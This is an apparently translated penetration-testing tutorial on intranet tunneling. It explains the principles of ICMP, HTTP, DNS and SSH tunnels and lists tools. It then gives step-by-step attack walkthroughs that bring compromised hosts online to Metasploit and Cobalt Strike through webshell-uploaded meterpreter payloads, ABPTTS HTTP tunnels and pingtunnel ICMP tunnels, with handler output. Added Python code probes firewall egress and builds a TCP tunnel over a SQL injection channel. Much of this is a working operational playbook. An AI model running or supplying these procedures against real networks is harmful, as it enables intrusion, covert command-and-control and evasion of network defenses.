1. Introduction
There are many articles about intranet penetration on the Internet, but most of them focus on how to use tools and rarely explain the principles. This article starts from the principle of intranet penetration and then designs a suitable scheme for each combination of outbound and inbound access an intranet host may have.
2. The principle of intranet penetration
Intranet penetration means using tunneling techniques to carry traffic inside a protocol that the network firewall allows, bypassing its blocking and reaching the otherwise blocked target network.
What is tunneling? The encyclopedia entry explains it as follows:
Tunneling is a method of passing data between networks by using the infrastructure of the internetwork. The data (or payload) transmitted through the tunnel may be data frames or packets of different protocols. The tunneling protocol re-encapsulates the data frames or packets of these other protocols in new packet headers and sends them. The new header provides routing information so that the encapsulated payload data can be passed across the Internet. The encapsulated packets are routed through the public internetwork between the two endpoints of the tunnel. The logical path through which the encapsulated data packets are transmitted on the public Internet is called a tunnel. Once at the end of the network, the data is unpacked and forwarded to the final destination. Note that tunnel technology refers to the whole process including data encapsulation, transmission and unpacking.
The tunneling technologies commonly used for intranet penetration are DNS, HTTP, SSH and ICMP tunnels, i.e. protocols that network firewalls usually let through.
These tunnels can be grouped by the protocol layer they operate at:
- network layer tunnels
ICMP tunnels, etc.
- transport layer tunnels
TCP tunnels, UDP tunnels
- application layer tunnels
HTTP, DNS, SSH and other tunnels
All possible outbound paths of an intranet host
- ICMP is allowed out
The network firewall lets ICMP out, i.e. the host can ping external hosts. ICMP is usually allowed out.
- Specific TCP or UDP ports are allowed out
The network firewall lets specific TCP or UDP destination ports out, typically the default ports of common services such as 22, 53, 80, 443 and 3389. In an environment that supposedly has no egress, probe every TCP and UDP port: usually one or two common ports turn out to be open. This is mostly the result of misconfiguration or laziness on the administrator's side. For example, firewall rules are evaluated in order and processing stops at the first match, so an inconsistent rule set can let traffic through that a later rule was meant to block; or the administrator needs the web server to reach a MySQL database on port 3306 in another subnet and, to save effort, allows the web server to reach port 3306 on any IP address.
- Specific application-layer protocols are allowed out (HTTP, SSH, DNS and similar)
This kind of network firewall identifies application-layer protocols and releases the ones allowed out, such as HTTP, SSH, DNS and RDP. Office networks usually allow HTTP out, possibly restricted further by a domain name whitelist.
All possible inbound paths to an intranet host
- ICMP is allowed in
The target host can be pinged.
- Specific TCP or UDP ports are allowed in
NAT maps a public IP and port to a service port on the intranet host, e.g. web and MySQL services exposed through NAT.
- Specific application-layer protocols are allowed in
This kind of network firewall identifies application-layer protocols and releases the ones allowed in, e.g. an HTTP reverse proxy that forwards HTTP traffic received from the public network to the intranet host. Mainstream deployments usually add a WAF in front to inspect the traffic.
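The outbound-port probing described above (try every TCP port and see which one or two get through) can be scripted. The following is an added example and not code from the original article: it classifies each port as open, refused or filtered, the point being that a refused connection is just as useful as an open one, since the SYN reached the host and the reply came back, so that port is not blocked on the way out. It assumes a probe target you control that listens on every port (passed as the first argument); self_check() runs the same logic against loopback so it can be tried offline.

```python
"""Outbound TCP port discovery: which ports does the firewall let out?"""
import socket
import sys
from concurrent.futures import ThreadPoolExecutor

# Default ports of common services, the ones a lazy rule set most often leaves open.
COMMON_PORTS = [21, 22, 25, 53, 80, 110, 123, 143, 443, 445, 465, 587, 993, 995,
                1433, 1521, 3306, 3389, 5432, 8080, 8443]


def probe_port(host, port, timeout=2.0):
    """'open': connected; 'refused': the host answered with RST (path allowed, nothing
    listening); 'filtered': no answer or unreachable within the timeout (dropped on the way)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "refused"
        except OSError:  # socket.timeout, EHOSTUNREACH, ENETUNREACH, ...
            return "filtered"


def probe_egress(host, ports=COMMON_PORTS, timeout=2.0, workers=32):
    """Probe many ports concurrently; returns {port: verdict}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        verdicts = list(pool.map(lambda p: probe_port(host, p, timeout), ports))
    return dict(zip(ports, verdicts))


def usable_egress(host, ports=COMMON_PORTS, timeout=2.0):
    """Ports that reached the host at all, i.e. candidates for a tunnel endpoint."""
    return sorted(p for p, v in probe_egress(host, ports, timeout).items() if v != "filtered")


def self_check():
    """Offline sanity check against loopback: one listening port, one closed port."""
    with socket.socket() as listener:
        listener.bind(("127.0.0.1", 0))
        listener.listen(1)
        open_port = listener.getsockname()[1]
        with socket.socket() as tmp:  # grab a free port number, then release it
            tmp.bind(("127.0.0.1", 0))
            closed_port = tmp.getsockname()[1]
        result = probe_egress("127.0.0.1", [open_port, closed_port], timeout=1.0)
        return result[open_port], result[closed_port]


if __name__ == "__main__":
    # Against a host under your control that listens on every port, the 'open' ports are
    # exactly the ones the firewall lets out; against any other host, 'refused' counts too.
    host = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    for port, verdict in probe_egress(host).items():
        print(port, verdict)
    print("usable:", usable_egress(host))
```

Probing all 65535 ports this way is fine on a fast link but is also exactly what a firewall's logs will show, so on a real engagement probe the common list first. UDP cannot be judged by a connect: test UDP egress with a real exchange, e.g. a DNS query to port 53 of a resolver you control.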
3. Common tools for intranet penetration
3.1. Network Layer Tunnel Tool
-
Reverse shell (cmd) over ICMP; single-purpose, and the reverse shell is extremely unstable; not recommended
-
Creates a virtual network interface and carries its traffic over ICMP, i.e. a VPN over an ICMP tunnel; requires root and is very noisy; not recommended
- pingtunnel
TCP, UDP and SOCKS5 over ICMP; fast, stable connection, cross-platform, and client mode works without administrator privileges; recommended (this is the tool used in the ICMP cases below)
3.2. Transport Layer Tunneling Tool
- netcat
The Swiss Army knife of networking tools; needs no introduction, and is preinstalled on most Linux systems
- powercat
netcat for PowerShell
- socat
Can log the forwarded traffic, which is convenient for inspecting what passes through; has to be installed separately
- netsh
The network configuration tool built into Windows (its portproxy context does port forwarding)
- lcx
Port forwarding tool
- NATBypass
A Go implementation of lcx; better cross-platform support and better documentation
- iox
Port forwarding and intranet proxy tool, similar in function to lcx/ew, with simplified command-line parameters, UDP forwarding support and good cross-platform support. Drawback: it cannot listen on a specific IP and binds 0.0.0.0:port by default, which increases exposure
3.3. Application Layer Tunneling Tool
Since there are many application-layer protocols, there are correspondingly many tunneling tools. The protocols used most often for tunneling are DNS, HTTP and SSH, typically exposing a SOCKS proxy over the tunnel.
- dnscat2
Not only can create DNS tunnel, but also C2
- dnscat2-powershell
Powershell client for dnscat2
- dns2tcp
TCP over DNS, that is, forwarding TCP connections through DNS tunnels
- iodine
IPv4 over DNS, that is, forwarding IPv4 data packets through DNS tunnels
- reGeorg
SOCKS over HTTP, i.e. a SOCKS proxy carried through an HTTP tunnel
- Neo-reGeorg
A refactored version of reGeorg with improved stability and usability and evasion of signature detection; actively maintained
- reDuh
TCP over HTTP, i.e. TCP connections forwarded through an HTTP tunnel; the tunnel is unstable
- Tunna
TCP and SOCKS over HTTP, i.e. TCP connections and SOCKS forwarded through an HTTP tunnel; the tunnel is unstable
- ABPTTS
TCP over HTTP, i.e. TCP connections forwarded through an HTTP tunnel; the data is encrypted, the HTTP traffic can be customized, it evades signature detection very well, and the tunnel it creates is very stable. Unfortunately the only supported server-side script types are aspx and jsp
- EarthWorm
Very convenient multi-level SOCKS proxy; no longer updated
- Termite
The upgraded version of EarthWorm; also no longer updated
- Venom
A multi-level proxy tool written in Go, designed for penetration testers
- ssocks
Forward and reverse SOCKS tool with a small executable
- s5.go
A SOCKS service written in Go with good cross-platform support
- ssh
In the commands below, user stands for the account on the ssh server 192.168.1.1.
Local forwarding: ssh -CNfg -L 127.0.0.1:7777:114.114.114.114:9999 user@192.168.1.1  # the ssh client listens on 127.0.0.1:7777 and sends the TCP connections it receives through the ssh tunnel to the server at 192.168.1.1, which forwards them to 114.114.114.114:9999
Remote forwarding: ssh -CNfg -R 127.0.0.1:7777:114.114.114.114:9999 user@192.168.1.1  # the ssh server listens on 127.0.0.1:7777 and sends the TCP connections it receives back through the tunnel to the ssh client, which forwards them to 114.114.114.114:9999 (binding a non-loopback address on the server side additionally requires GatewayPorts yes in sshd_config)
Dynamic forwarding: ssh -CNfg -D 127.0.0.1:7777 user@192.168.1.1  # the ssh client runs a SOCKS service on 127.0.0.1:7777; SOCKS requests go through the tunnel to the server at 192.168.1.1, which connects to the requested destination
Common parameters for building an ssh tunnel: -C compress the traffic; -f go to the background after authentication; -N do not execute a remote command (tunnel only); -g allow remote hosts to connect to the locally forwarded port; -L local port forwarding; -R remote port forwarding; -D dynamic forwarding, i.e. a SOCKS proxy; -p port of the ssh server
4. Intranet penetration cases in practice
4.1. Bringing online an intranet host with zero outbound access
Background: the host on which we obtained a webshell sits in the intranet and nothing goes out: not network-layer protocols such as ICMP, not transport-layer TCP or UDP, not application-layer DNS or HTTP. The only data channel is the web application itself, which is reachable from outside through a reverse proxy.
Design
Use the HTTP connection to the reverse-proxied web application to build a forward TCP over HTTP tunnel. Through this tunnel we can initiate TCP connections to the intranet host: generate a bind-type payload, upload and execute it through the webshell so that it listens on a port, and let the C2 platform connect to that port through the tunnel.
Tools that build TCP over HTTP tunnels include ABPTTS, Tunna and reDuh. The TCP connections built by Tunna and reDuh are unstable, so ABPTTS is used here.
4.1.1. Bringing Metasploit online
1. Build a TCP connection through a forward HTTP tunnel
# set up the abptts runtime (ABPTTS is a Python 2 tool)
# note: installing pycrypto on Windows first needs Microsoft Visual C++ Compiler for Python 2.7, http://aka.ms/vcpython27
pip install httplib2
pip install pycrypto
# generate the server-side script
python abpttsfactory.py -o server
# upload the server-side script to the web server, then run the client as follows
python abpttsclient.py -c server/config.txt -u "http://192.168.168.10/abptts.aspx" -f 127.0.0.1:7777/127.0.0.1:8888
# the abptts client listens on 127.0.0.1:7777 and forwards TCP connections made to it, through the HTTP tunnel at http://192.168.168.10/abptts.aspx, to 127.0.0.1:8888 as seen from the web server
2. Generate a bind-type payload, upload it through the webshell and execute it
# rhost and lport here are the destination of the forward, i.e. the address the payload listens on, on the web server
msfvenom -p windows/meterpreter/bind_tcp rhost=127.0.0.1 lport=8888 -f exe -o meterpreter.exe
3. Start the msf handler and wait for meterpreter to come online
# rhost and lport here are the IP and port the abptts client listens on; the msf host must be able to reach them (here msf and the abptts client run on the same host)
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf5 exploit(multi/handler) > set lport 7777
lport => 7777
msf5 exploit(multi/handler) > run
[*] Started bind TCP handler against 127.0.0.1:7777
[*] Sending stage (180291 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 127.0.0.1:7777) at 2020-04-27 04:50:25 -0400
meterpreter > getuid
Server username: DESKTOP-0AH7FQ0\admin
4.1.2. Bringing Cobalt Strike online
Cobalt Strike's bind-type listeners are only Beacon TCP and Beacon SMB, and both are designed to be linked from a parent beacon rather than to connect to the team server directly, so a parent beacon is needed to relay the connection.
1. Build a TCP connection through a forward HTTP tunnel (same as in 4.1.1)
# set up the abptts runtime (ABPTTS is a Python 2 tool)
# note: installing pycrypto on Windows first needs Microsoft Visual C++ Compiler for Python 2.7, http://aka.ms/vcpython27
pip install httplib2
pip install pycrypto
# generate the server-side script
python abpttsfactory.py -o server
# upload the server-side script to the web server, then run the client as follows
python abpttsclient.py -c server/config.txt -u "http://192.168.168.121/abptts.aspx" -f 127.0.0.1:7777/127.0.0.1:8888
# the abptts client listens on 127.0.0.1:7777 and forwards TCP connections made to it, through the HTTP tunnel at http://192.168.168.121/abptts.aspx, to 127.0.0.1:8888 as seen from the web server
2. Create a reverse listener on the team server
3. Generate a parent beacon for that listener
4. Run the parent beacon on the host where the abptts client runs (that host can reach the team server directly)
5. Create a listener whose payload is Beacon TCP, listening on port 8888, the destination of the abptts forward
6. Generate a stageless child beacon for that listener
7. Upload the child beacon through the webshell and execute it
# check the listening sockets through the webshell to make sure the child beacon started
netstat -ano | findstr 127.0.0.1:8888
8. In the parent beacon, run connect against the address the abptts client listens on (127.0.0.1 7777); the link is carried through the HTTP tunnel to the child beacon
9. The webshell host, which has no outbound access at all, is now online
4.2. Bringing online intranet hosts whose only outbound protocol is ICMP
Background: we obtained a shell on an intranet host through some channel, but that channel is not suitable as a C2 channel. A typical case is a site whose web server and database server are separate hosts: we got a shell on the database server through SQL injection, but the database server can only send ICMP out; transport-layer protocols such as TCP and UDP and application-layer protocols such as DNS and HTTP are all blocked.
Design
Since ICMP can go out, build a reverse TCP over ICMP or SOCKS over ICMP tunnel through it and bring the host online to the C2 platform through that tunnel. The tunnel tool is pingtunnel, which forwards TCP, UDP and SOCKS5 connections through ICMP tunnels.
4.2.1. ICMP tunnel forwarding TCP: Metasploit
1. Prepare a server with a public IP and run the following as root to start the ICMP tunnel server (raw ICMP sockets require root)
./pingtunnel -type server -noprint 1 -nolog 1
2. On the ICMP tunnel client (the host that needs to come online through the tunnel), run the following to create the reverse ICMP tunnel
pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1
# the icmp client listens on 127.0.0.1:9999 and forwards the TCP traffic it receives there, through the ICMP tunnel to icmpserver_ip, to c2_server_ip:7777
3. Generate a reverse-payload meterpreter, upload it to the ICMP tunnel client and execute it to come online
msfvenom -p windows/meterpreter/reverse_https lhost=127.0.0.1 lport=9999 -f exe -o meterpreter.exe
# lhost and lport here are the IP and port the icmp client listens on
4. Start the msf handler and wait for meterpreter to come online
# lport here is the port the icmp client forwards to (c2_server_ip:7777); the handler runs on the C2 server
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 7777
lport => 7777
msf5 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://0.0.0.0:7777
meterpreter > getuid
Server username: DESKTOP-test0\admin
4.2.2. ICMP tunnel forwarding SOCKS: Metasploit
1. Prepare a server with a public IP and run the following as root to start the ICMP tunnel server
./pingtunnel -type server -noprint 1 -nolog 1
2. On the ICMP tunnel client (the host that needs to come online through the tunnel), run the following to create the reverse ICMP tunnel
pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1
# the icmp tunnel client starts a SOCKS5 service on 127.0.0.1:6688; proxy requests go through the ICMP tunnel to icmpserver_ip, and the icmp server connects to the requested destination
3. Generate a reverse-payload meterpreter that goes through the SOCKS5 proxy, upload it to the ICMP tunnel client and execute it to come online
msfvenom -p windows/meterpreter/reverse_https LHOST=c2_server_ip LPORT=8443 HttpProxyType=SOCKS HttpProxyHost=127.0.0.1 HttpProxyPort=6688 -f exe -o meterpreter.exe
# HttpProxyHost and HttpProxyPort are the SOCKS5 listener of the icmp client; LHOST and LPORT are the C2 server the proxy connects to on the payload's behalf
4. Start the msf handler and wait for meterpreter to come online
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf5 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf5 exploit(multi/handler) > set lport 8443
lport => 8443
msf5 exploit(multi/handler) > run
[*] Started HTTPS reverse handler on https://0.0.0.0:8443
meterpreter > getuid
Server username: DESKTOP-test0\admin
4.2.3. ICMP tunnel forwarding TCP: Cobalt Strike
1. Prepare a server with a public IP and run the following as root to start the ICMP tunnel server
./pingtunnel -type server -noprint 1 -nolog 1
2. On the ICMP tunnel client (the host that needs to come online through the tunnel), run the following to create the reverse ICMP tunnel
pingtunnel.exe -type client -l 127.0.0.1:9999 -s icmpserver_ip -t c2_server_ip:7777 -tcp 1 -noprint 1 -nolog 1
# the icmp tunnel client listens on 127.0.0.1:9999 and forwards the TCP traffic it receives there, through the ICMP tunnel to icmpserver_ip, to c2_server_ip:7777
3. Create a listener in Cobalt Strike
# HTTPS Host and HTTPS Port (C2) are the IP and port the ICMP tunnel client listens on (127.0.0.1:9999): this is where the beacon connects
# HTTPS Port (Bind) is the port of the forward's destination (7777): this is where the team server actually listens
4. Generate a beacon with the reverse payload
5. Upload the beacon to the ICMP tunnel client and execute it; it comes online through the reverse ICMP tunnel
4.2.4. ICMP tunnel forwarding SOCKS: Cobalt Strike
1. Prepare a server with a public IP and run the following as root to start the ICMP tunnel server
./pingtunnel -type server -noprint 1 -nolog 1
2. On the ICMP tunnel client (the host that needs to come online through the tunnel), run the following to create the reverse ICMP tunnel
pingtunnel.exe -type client -l 127.0.0.1:6688 -s icmpserver_ip -sock5 1 -nolog 1 -noprint 1
# the icmp tunnel client starts a SOCKS5 service on 127.0.0.1:6688; proxy requests go through the ICMP tunnel to icmpserver_ip, and the icmp server connects to the requested destination
3. Create a listener in Cobalt Strike
# the proxy here could in principle be SOCKS or HTTP
# however, Beacon's manual proxy settings only accept an HTTP proxy, not SOCKS5, so a listener pointed straight at the pingtunnel SOCKS5 port does not come online
# an HTTP proxy can be used instead, with a tool such as privoxy converting HTTP proxy requests into SOCKS5 requests
4. Select the created listener, generate a beacon, upload it to the target and execute it to come online
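As an added illustration of the privoxy route just mentioned (not configuration from the original article): a minimal privoxy configuration that exposes an HTTP proxy on 127.0.0.1:8118 and hands every request to the pingtunnel SOCKS5 listener on 127.0.0.1:6688 from step 2. Port 8118 is privoxy's default and is assumed here; the Cobalt Strike listener's manual proxy settings then point at 127.0.0.1:8118.

```conf
# privoxy config, relevant lines only (runs on the ICMP tunnel client host)
listen-address 127.0.0.1:8118
# forward-socks5t resolves host names on the SOCKS side, so no DNS leaves the host directly;
# the trailing "." means there is no further parent HTTP proxy
forward-socks5t / 127.0.0.1:6688 .
```

With this in place, Beacon's HTTP proxy traffic goes privoxy, then SOCKS5 on 6688, then the ICMP tunnel, then the pingtunnel server, and finally the team server.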
5. Summary
The essence of intranet penetration is forwarding transport-layer TCP/UDP packets through whatever communication channel is available, forward or reverse; application-layer protocols are then built on top of that transport. For example, ABPTTS + a SOCKS service = reGeorg.
The precondition for intranet penetration is remote code execution through some communication channel. If code can be executed through a channel, TCP/UDP packets can be forwarded through it too, i.e. a TCP/UDP over <something> tunnel can be built on it. If no ready-made tool exists, we may have to write one. For example, with a shell obtained through SQL injection, the same channel can carry TCP/UDP packets even though no tool does this out of the box: the tunnel client encapsulates the TCP/UDP data into the database, and the tunnel server reads the encapsulated data back out of the database, unpacks it and sends it to the corresponding address.
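The "TCP over a database" tunnel sketched in the summary, and the encapsulate-transmit-unpack principle from section 2, worked through as an added example (this is not code from the article or from any of the tools it lists). A SQLite file stands in for the DBMS: the tunnel client, which would run on the operator side and write through the SQL injection, only inserts into and reads from two tables; the tunnel server, which would run as an agent on the database host, polls the same tables and turns the rows back into real TCP connections. demo() wires both ends to a local echo service so the whole thing runs offline; the table names, message kinds and polling interval are this example's own choices.

```python
"""TCP over a shared database: the two tunnel ends never talk to each other directly,
they only read and write two tables. A SQLite file stands in for the real DBMS."""
import contextlib
import os
import select
import socket
import sqlite3
import tempfile
import threading
import time

POLL = 0.02  # seconds between database polls


def _sql(path, sql, args=()):
    """Run one statement on a short-lived connection; `con` as context manager commits, closing() closes."""
    with contextlib.closing(sqlite3.connect(path, timeout=5)) as con, con:
        return con.execute(sql, args).fetchall()


def init_db(path):
    for t in ("up", "down"):  # up: operator -> target, down: the replies
        _sql(path, f"CREATE TABLE IF NOT EXISTS {t} (id INTEGER PRIMARY KEY, sid TEXT, kind TEXT, data BLOB)")


def put(path, table, sid, kind, data=b""):
    """Queue one message; kind is 'connect', 'data' or 'close'."""
    _sql(path, f"INSERT INTO {table}(sid, kind, data) VALUES (?, ?, ?)", (sid, kind, data))


def drain(path, table):
    """Pop every queued message in insertion order; returns a list of (sid, kind, data)."""
    rows = _sql(path, f"SELECT id, sid, kind, data FROM {table} ORDER BY id")
    if rows:
        _sql(path, f"DELETE FROM {table} WHERE id <= ?", (rows[-1][0],))
    return [(s, k, bytes(d)) for _, s, k, d in rows]


def tunnel_server(path, stop):
    """Runs where the target is reachable (the DB host): replays queued messages as real TCP."""
    socks = {}  # sid -> socket to the target
    while not stop.is_set():
        time.sleep(POLL)
        for sid, kind, data in drain(path, "up"):
            if kind == "connect":
                host, port = data.decode().rsplit(":", 1)
                try:
                    socks[sid] = socket.create_connection((host, int(port)), timeout=5)
                except OSError:
                    put(path, "down", sid, "close")  # target unreachable: hang up the client side
            elif kind == "data" and sid in socks:
                socks[sid].sendall(data)
            elif kind == "close" and sid in socks:
                socks.pop(sid).close()
        for s in (select.select(list(socks.values()), [], [], 0)[0] if socks else []):
            sid = next(k for k, v in socks.items() if v is s)
            buf = s.recv(65536)
            put(path, "down", sid, "data" if buf else "close", buf)
            if not buf:
                socks.pop(sid).close()


def listen_local():
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv


def tunnel_client(path, srv, target, stop):
    """Runs on the operator side: each connection accepted on srv becomes one tunnel session."""
    sessions = {}  # sid -> local socket
    srv.settimeout(POLL)  # accept() doubles as the poll interval
    while not stop.is_set():
        try:
            conn, _ = srv.accept()
            sid = os.urandom(8).hex()
            sessions[sid] = conn
            put(path, "up", sid, "connect", target.encode())
        except socket.timeout:
            pass
        for conn in (select.select(list(sessions.values()), [], [], 0)[0] if sessions else []):
            sid = next(k for k, v in sessions.items() if v is conn)
            buf = conn.recv(65536)
            put(path, "up", sid, "data" if buf else "close", buf)
            if not buf:
                sessions.pop(sid).close()
        for sid, kind, data in drain(path, "down"):
            if sid in sessions and kind == "data":
                sessions[sid].sendall(data)
            elif sid in sessions:
                sessions.pop(sid).close()
    srv.close()


def demo(message=b"hello through the database\n"):
    """Local end-to-end run against an echo service; returns what came back through the tunnel."""
    path = os.path.join(tempfile.mkdtemp(), "channel.db")
    init_db(path)
    echo = listen_local()  # stands in for the service that only the DB host can reach
    def echo_loop():
        conn, _ = echo.accept()
        while chunk := conn.recv(4096):
            conn.sendall(chunk)
    stop = threading.Event()
    threading.Thread(target=echo_loop, daemon=True).start()
    threading.Thread(target=tunnel_server, args=(path, stop), daemon=True).start()
    entry = listen_local()
    target = "127.0.0.1:%d" % echo.getsockname()[1]
    threading.Thread(target=tunnel_client, args=(path, entry, target, stop), daemon=True).start()
    with socket.create_connection(("127.0.0.1", entry.getsockname()[1]), timeout=5) as client:
        client.sendall(message)
        got = b""
        while len(got) < len(message):
            got += client.recv(4096)
    stop.set()
    return got


if __name__ == "__main__":
    print(demo())
```

Swap the SQLite calls in _sql for whatever the injection point lets you execute (an INSERT through a stacked query, a SELECT through an error- or union-based read) and the agent side for code running on the database host, and the same three message kinds carry any TCP session, including a SOCKS server such as the ones the article lists. Throughput is bounded by the polling interval and the round trip of each query, which is why the real tools polish exactly this loop.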